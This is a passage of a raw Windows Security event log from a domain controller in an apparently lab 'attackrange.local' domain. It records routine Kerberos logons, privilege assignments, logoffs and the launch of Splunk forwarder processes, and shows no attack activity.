Process Name: -
Network Information:
Workstation Name: -
Source Network Address: ::1
Source Port: 53484
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 03:22:56 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=264593
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x837B39
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 03:23:07 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264596
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0xe04
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:23:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264598
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x19a0
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:23:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264597
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0xf98
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:23:09 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264599
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x13c8
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:23:13 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264601
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0xe7c
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:23:13 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264600
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0xa80
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:23:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264602
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1534
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:23:56 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=264605
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x83B65D
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 03:23:56 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=264604
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x83B65D
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: ::1
Source Port: 53498
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 03:23:56 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=264603
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x83B65D
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 03:24:07 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=264619
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x83BB50
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 03:24:07 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=264618
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x83BC3F
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 03:24:07 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=264617
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x83BC87
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 03:24:07 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=264616
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Delegation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x83C204
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {271648EC-6A60-17D5-CF0E-2D75C946746E}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: fe80::4c41:d752:3570:2ca6
Source Port: 53507
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 03:24:07 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=264615
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x83C204
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 03:24:07 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264614
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1498
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:24:07 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=264613
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x83BC87
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: 10.0.1.14
Source Port: 53504
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 03:24:07 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=264612
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x83BC87
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 03:24:07 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=264611
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x83BC3F
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: ::1
Source Port: 0
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 03:24:07 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=264610
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x83BC3F
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 03:24:07 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=264609
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x83BB50
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: fe80::4c41:d752:3570:2ca6
Source Port: 53503
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 03:24:07 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=264608
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x83BB50
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 03:24:07 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=264607
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x83BB2E
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: fe80::4c41:d752:3570:2ca6
Source Port: 53502
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 03:24:07 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
